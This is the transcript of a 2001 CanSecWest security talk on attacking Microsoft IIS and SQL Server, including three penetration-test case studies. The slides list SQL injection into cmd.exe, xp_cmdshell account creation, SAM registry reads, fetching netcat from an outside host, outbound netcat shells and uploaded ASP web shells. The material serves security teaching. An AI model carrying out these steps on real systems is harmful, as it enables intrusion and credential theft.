CanSecWest 2001 - PowerPoint PPT Presentation

1 / 27
About This Presentation
Title:

CanSecWest 2001

Description:

Working With You To Secure Your Networks. 2. Introduction. Background Information ... The sheer number of problems an out of the box installation has almost ... – PowerPoint PPT presentation

Number of Views:381
Avg rating:3.0/5.0
Slides: 28
Provided by: hdmo
Category:
Tags: cansecwest | sheer

less

Transcript and Presenter's Notes

Title: CanSecWest 2001


1
CanSecWest 2001
  • H D Moore
  • Digital Defense Inc.
  • Working With You To Secure Your Networks

2
Introduction
  • Background Information
  • Why bother with NT?
  • Internet Information Server
  • Microsoft SQL Server
  • Three Case Studies

3
Background
  • Myself
  • Experience
  • Projects
  • Digital Defense
  • Our Services
  • Our Clients

4
Why bother with NT?
  • Over 20 of Internet web sites run on NT
  • Popular platform in the financial industry
  • Very difficult to make secure
  • Relatively simple to exploit

5
IIS - Overview
  • What is IIS?
  • Easy to use, easy to hack
  • Default install is massively vulnerable
  • Sample scripts provide multiple points of entry
  • Default extensions have a number of problems
  • Unicode bug allows easy command execution
  • Remote Data Services

6
IIS Sample Files
  • Samples are installed by default.
  • Service packs and patches leave samples.
  • Examples
  • /iisadmpwd/aexp4b.htr
  • /msadc/samples/adctest.asp
  • Showcode.asp

7
IIS Extensions
  • Service packs leave extensions mapped
  • .ida/.idq/.idc Path Disclosure
  • .htr/.htw View File Source
  • Importance of Global.asa

8
IIS UNICODE
  • What is UNICODE?
  • 63 ways to write the letter A
  • The directory transversal bug
  • Command execution as the IUSR account
  • Application directory transversal
  • Unicoder.pl

9
IIS RDS
  • What is RDS?
  • MDAC 1.5 allows embedded VBA code
  • Upgrading to 2.x doesnt restrict access
  • SQL Relaying Attacks
  • RDS over RDS
  • Port scanning via RDS
  • Sqlrds.pl

10
(No Transcript)
11
IIS Summary
  • The sheer number of problems an out of the box
    installation has almost guarantees that you will
    be able to gain access
  • Microsofts attempt to make IIS as versatile and
    easy to use as possible also created many
    security problems
  • IIS has a long history of security bugs and it
    doesnt look like its getting any better

12
IIS Questions
  • ?

13
Microsoft SQL Server
  • Based on Sybase engine
  • Default accounts are the biggest problem
  • Vendor software automatically installs server
  • Most SQL user restrictions can be bypassed
  • Extended Stored Procedures allow everything from
    command execution to e-mailing query results

14
SQL Default Accounts
  • The default sa account
  • The probe account in MS-SQL 6.5
  • Using an unprivileged account to gain access to
    other servers and accounts via OLE.
  • Microsofts samples all use the sa account with
    no password.

15
SQL Ext. Procedures
  • The classic xp_cmdshell
  • Reading the SAM with xp_regread
  • Listing DSNs with xp_enumdsn
  • Remote output with sp_makewebtask
  • Accessible NetBIOS share
  • sp_makewebtask \\ip\share\out.html, select

16
SQL Exploitation
  • Finding servers
  • osql L
  • SQLPing (www.sqlsecurity.com/faq.html)
  • Logging in
  • Default sa and probe accounts
  • Finding passwords stored in ASP
  • Getting Access
  • Xp_cmdshell net user /ADD
  • Xp_regread HKLM/Security/SAM

17
SQL Summary
  • The features that Microsoft added to the base
    Sybase engine make it much more hacker friendly
  • Multiple access methods and information
    divulgence make finding and connecting to the
    server relatively easy
  • Lack of security documentation in conjunction
    with Microsofts sample code ensures the problem
    is only going to get worse

18
SQL Questions
  • ?

19
Case Study MDAC 1.5
  • All samples were removed
  • System was running the latest patches
  • ASP based employee directory
  • Single quote in the name field produced an ODBC
    error
  • ODBC error message contained table and column
    names, which I used to rewrite the SQL query

20
Case Study MDAC 1.5
  • SELECT from TBL where ID field
  • field BOGUS OR ID shell(cmd.exe /c )
  • SELECT from TBL where ID BOGUS OR ID
    shell(cmd.exe /c )
  • Executed rdisk /s- to rebuild SAM file
  • Copied sam._ to web root directory and cracked it
  • copy \\www.desktopgirls.com\share\nc.exe c\
  • Launched an outgoing netcat command shell to port
    80
  • Used Admin password to gain access to rest of
    network

21
Case Study SQL RDS
  • IIS 3.0 with samples removed
  • Not vulnerable to Unicode
  • Msadcs.dll (RDS) was available, but had been
    upgraded to 2.5
  • Created a Perl script which used RDS to relay a
    SQL connection to localhost, using the default
    sa account with no password

22
Case Study SQL RDS
  • Called the xp_cmdshell stored procedure to
    rebuild the SAM and copy it over to the web root
    directory
  • Executed netcat to send an outbound command shell
  • Used Admin password to access the rest of the
    network

23
Case Study VNC
  • IIS 4.0 with no samples
  • Unicode vulnerability
  • Port 1300 allowed through firewall
  • Used the Unicode vulnerability to create the
    upload.asp script
  • Uploaded the cmdasp.asp script, which provides
    SYSTEM access under IIS 4.0

24
Case Study VNC
  • VNC display set to 4600 or 60395
  • Uploaded the VNC server, reg.exe, the registry
    file, and dlls through upload.asp
  • Imported registry and installed WinVNC
  • Started VNC service and connected to port 1300
  • Hijacked the desktop of the current user

25
Case Studies
  • Questions?

26
(No Transcript)
27
Conclusion
  • Resources
  • http//www.digitaloffense.net/csw/
  • http//www.wiretrip.net/rfp
  • http//www.sqlsecurity.com/
  • hdmoore_at_digitaldefense.net
Write a Comment
User Comments (0)
About PowerShow.com